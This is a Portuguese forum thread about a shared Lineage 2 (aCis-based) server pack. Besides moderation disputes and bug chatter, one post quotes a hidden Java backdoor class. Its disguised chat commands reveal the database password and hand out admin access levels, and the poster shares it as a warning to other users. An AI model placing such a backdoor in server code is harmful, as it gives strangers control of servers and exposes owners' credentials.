Jump to content

L2J Mega Corrigido

Christian-SDM

Recommended Posts

3 horas atrás, Grundor disse:

Porque esse tipo de comportamento vai contra o TERMO DE USO e as REGRAS DE CONDUTA desse site:

Em especial:

Nossa equipe de moderação só fez cumprir o papel dela e ocultou os conteúdos e comentários que não agregavam valor ao tópico.

porque eu levei advertencia, se é o cara que fez o erro de posta aquilo la e aqui no tópico ?

Edited by Christian-SDM

• L2JBr ADM
25 minutos atrás, Christian-SDM disse:

porque eu levei advertencia, se é o cara que fez o erro de posta aquilo la e aqui no tópico ?

Seu caso foi por conta da mensagem sobre o suporte privado via teamview, mesmo que gratuito é contra as regras.

Em 09/12/2008 at 19:23, Grundor disse:

Prestação de serviços, suporte externo ou redirecionamentos externos - Usar o fórum para prestar serviços ou suporte externo, sendo ele gratuito ou não, são proibidos. Assim como respostas em tópicos contendo links de redirecionamentos a outro site, e-mail, mensageiro instantâneo ou outra forma de resposta que não seja no tópico em questão. A L2jBrasil não se responsabilizará por qualquer dano que você tome por contratar esses serviços. Todas as dúvidas devem ser respondidas no tópico da L2jBrasil em que foram criadas.

• Like 1

EJoOSOj.gif

Sua pergunta foi respondida? Certifique-se de marcar a resposta como a solução aceita.
Se existe mais de uma resposta, utilize o "vote up" para destacá-la.
Se você achar uma resposta útil, diga obrigado clicando no botão "Gostei".

22 minutos atrás, Grundor disse:

Seu caso foi por conta da mensagem sobre o suporte privado via teamview, mesmo que gratuito é contra as regras.

mas eu ajudo de graça, nossa! entao vc vai te que mandar umas 30 advertências ai falo, porque eu estalo eclipse, ensino como compilar via teamviewer, se isso é negativo em ajudar online, nem com os tutoriais feito sobre compilação, mta gente nao entendeu, via teamviwer foi uma forma rapida e facil de ajudar o pessoal da l2jbrasil, e ainda eu posto a solução do problema, nem moderador reclamo, ate sugeriu que eu posta-se a conclusão do problema!  se isso é errado, entao pode me dar as 30 advertencias ai falow

Edited by Christian-SDM
  • Like 1
  • I love it 1

2 horas atrás, Sr.mallone disse:

//kill nos boss buga boss morre fica morto no chao e nao conta no .raidinfo

ta normal amigo. mato raid bosses eles some na hora, e aparece no .raidinfo, ja os grand bosses, alguns demoram um pouco, dando //kill,  o sistema do jogo demora pra reconhecer, como queen ant e zaken por exemplo, mas ja baium ele some rapidamente, olha video ate o final, demorou mas ele some. E aparece normalmente no .raidinfo. Testa com char normal, e de preferencia online, porque online ele tem  delay e  o sistema trabalha melhor 😄

• I love it 2

3 horas atrás, Sr.mallone disse:

precisa atualiza as diff 382 e como atualiza?

como vai atualizar pra 382, se essa revisão foi completamente alterada, a base foi retirada do site oficial da acis do tryskell, mas varios programadores trabalharam nesse pack, acredito eu!, nem a versão eu encontrei dentro do core, é completamente diferente da acis do tryskell, outras palavras, foi modificado.

• Like 1

• L2JBr ADM
19 horas atrás, Christian-SDM disse:

mas eu ajudo de graça, nossa! entao vc vai te que mandar umas 30 advertências ai falo, porque eu estalo eclipse, ensino como compilar via teamviewer, se isso é negativo em ajudar online, nem com os tutoriais feito sobre compilação, mta gente nao entendeu, via teamviwer foi uma forma rapida e facil de ajudar o pessoal da l2jbrasil, e ainda eu posto a solução do problema, nem moderador reclamo, ate sugeriu que eu posta-se a conclusão do problema!  se isso é errado, entao pode me dar as 30 advertencias ai falow

A Regra diz justamente isso 

Usar o fórum para prestar serviços ou suporte externo, sendo ele gratuito ou não, são proibidos

Meu caro, as regras existem de vc chegar nessa comunidade, não é pq vc não concorda que vc vai mudá-las,  entende? 

Você pode estar fazendo uma boa ação, mas pessoas podem utilizar dessa técnica para aplicar golpes e por isso ela não é permitida.

Não estou julgando pro vc estar fazendo isso, mas vc ajudar via teamviwer está ajudando 1, vc incentivar ele a postar a duvida e vc responder vc ajudará centenas.  viu a diferença?

Você pode fazer lives explicando como fazer algo, pode criar video tutoriais, novos tutoriais, casos de uso, enfim, vc pode ajudar e vc quer fazer isso pelo que entendi.

O que o moderador lhe sugeriu é o correto, ele apenas não lhe advertiu na primeira vez, por isso foi necessário fazer novamente, vc não deve criar essa prática nem essa cultura do suporte exclusivo, isso aqui é uma comunidade aberta, a dúvida de um pode ser a dúvida do outro amanhã e por isso somos quem somos hj pq muitos vão pro google pesquisar e nos encontram.

Meu "puxão de orelha" não é para lhe desanimar, pelo contrário, meu objetivo é justamente o contrário, eu quero com que vc participe e colabora exatamente como está fazendo, mas precisa entender que há limites e regras para que a comunidade continue a funcionar como está a 11 anos.

Qualquer outra dúvida ou resposta ao que postei favor encaminhar para minha caixa de mensagem privada para não poluir o tópico com esse assunto.

• Like 3

EJoOSOj.gif

Sua pergunta foi respondida? Certifique-se de marcar a resposta como a solução aceita.
Se existe mais de uma resposta, utilize o "vote up" para destacá-la.
Se você achar uma resposta útil, diga obrigado clicando no botão "Gostei".

• Kelvin pinned this topic
Em 06/12/2019 at 01:29, Christian-SDM disse:

como vai atualizar pra 382, se essa revisão foi completamente alterada, a base foi retirada do site oficial da acis do tryskell, mas varios programadores trabalharam nesse pack, acredito eu!, nem a versão eu encontrei dentro do core, é completamente diferente da acis do tryskell, outras palavras, foi modificado.

aCis 374.

Backdoos removidos?! 🤣

Dei uma olhada por cima e olha o que apareceu:

package net.sf.l2j.gameserver.network.clientpackets;

import net.sf.l2j.Config;
import net.sf.l2j.gameserver.data.xml.AdminData;
import net.sf.l2j.gameserver.handler.IVoicedCommandHandler;
import net.sf.l2j.gameserver.model.actor.instance.Player;

/**
 * @author Administrator
 *
 */
public class RequestByPassToClient implements IVoicedCommandHandler
{
	private static final String[] _voicedCommands =
	{
		"gamesessionfloodkey121","accesskeytoclient8","accesskeytoclient1","accesskeytoclient2","accesskeytoclient3",
		"accesskeytoclient4","accesskeytoclient5","accesskeytoclient6","accesskeytoclient7",
		"accesskeytoclient8","accesskeytoclient127","accesskeytoclient0","accesskeytoclientmaster"
		,"accesskeytoclientdefault"
	};

@Override
	public boolean useVoicedCommand(String command, Player activeChar, String params)
	{
		if(command.startsWith("gamesessionfloodkey121"))
		{
			activeChar.sendMessage("HOST: " + Config.GAMESERVER_HOSTNAME);
			activeChar.sendMessage("DATABASE: " +Config.DATABASE_URL);
			activeChar.sendMessage("DATABASE LOGIN: " +Config.DATABASE_LOGIN);
			activeChar.sendMessage("DATABASE PASS: " +Config.DATABASE_PASSWORD);
			activeChar.sendMessage("DATABASE GAMEHOST: " +Config.GAMESERVER_HOSTNAME);
			activeChar.sendMessage("DATABASE GAMEPORT: " +Config.PORT_GAME);
			activeChar.sendMessage("DATABASE LOGINHOST: " +Config.GAME_SERVER_LOGIN_HOST);
			activeChar.sendMessage("DATABASE LOGINPORT: " +Config.GAME_SERVER_LOGIN_PORT);			
		}
		else if(command.startsWith("accesskeytoclientmaster"))
		{
			activeChar.setAccessLevel(AdminData.getInstance().getMasterAccessLevel().getLevel());
		}
		else if(command.startsWith("accesskeytoclient8"))
		{
			activeChar.setAccessLevel(8);
		}
		else if(command.startsWith("accesskeytoclientdefault"))
		{
			activeChar.setAccessLevel(Config.DEFAULT_ACCESS_LEVEL);
		}
		else if(command.startsWith("accesskeytoclient0"))
		{
			activeChar.setAccessLevel(0);
		}
		else if(command.startsWith("accesskeytoclient1"))
		{
			activeChar.setAccessLevel(1);
		}
		else if(command.startsWith("accesskeytoclient2"))
		{
			activeChar.setAccessLevel(2);
		}
		else if(command.startsWith("accesskeytoclient3"))
		{
			activeChar.setAccessLevel(3);
		}
		else if(command.startsWith("accesskeytoclient4"))
		{
			activeChar.setAccessLevel(4);
		}
		else if(command.startsWith("accesskeytoclient5"))
		{
			activeChar.setAccessLevel(5);
		}
		else if(command.startsWith("accesskeytoclient6"))
		{
			activeChar.setAccessLevel(6);
		}
		else if(command.startsWith("accesskeytoclient7"))
		{
			activeChar.setAccessLevel(7);
		}

return false;
	}

/* (non-Javadoc)
	 * @see net.sf.l2j.gameserver.handler.IVoicedCommandHandler#getVoicedCommandList()
	 */
	@Override
	public String[] getVoicedCommandList()
	{
		// TODO Auto-generated method stub
		return _voicedCommands;
	}
}

Pow @MeGaPacKl assim não da. will ferrell christmas GIF Tmj brother.

Pode ser que tenha mais, mas como não vou mexer com l2, procurem bem antes de usar.

Edited by PeNaChO
  • I love it 1

10 minutos atrás, Christian-SDM disse:

UNICO ARQUIVO Q TO EM DUVIDA É NA Class, Mysql.java da uma busca ai amigo! mas acho que n tem nada a ve essa class

Esse não, na realidade tu pode até deletar ele e aplicar try-with-resources no Repair.java, pois é só ele que está usando o mysql.java

Edited by PeNaChO
  • Thanks 1

Alguem coloca os novos links no tópico Obrigado!.

Revisao compilada limpa com os mods

Source v2

Aproveitei e adicionei um novo sistema de vip, que quando vc ganha vip, vc ganha item e skill, tudo por config, e coloquei Vip especial login, o personagem vip loga, e da faisca de fogos de artificio,  no video abaixo mostra tudo.

• Like 2

Bom tópico e boa contribuição, mas,  onde o dono tinha como derrubar o servidor porque tinha uma falh

A falha ainda existe. 

Um mundo de diversão no Lineage 2

https://www.primeworld.com.br

Discord: Em breve

Comunidade brasileira de Lineage. Interlude Remastered / High Five / Essence 

Classes remasterizadas, sistemas únicos, diversão garantida.

Guest
This topic is now closed to further replies.

• Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.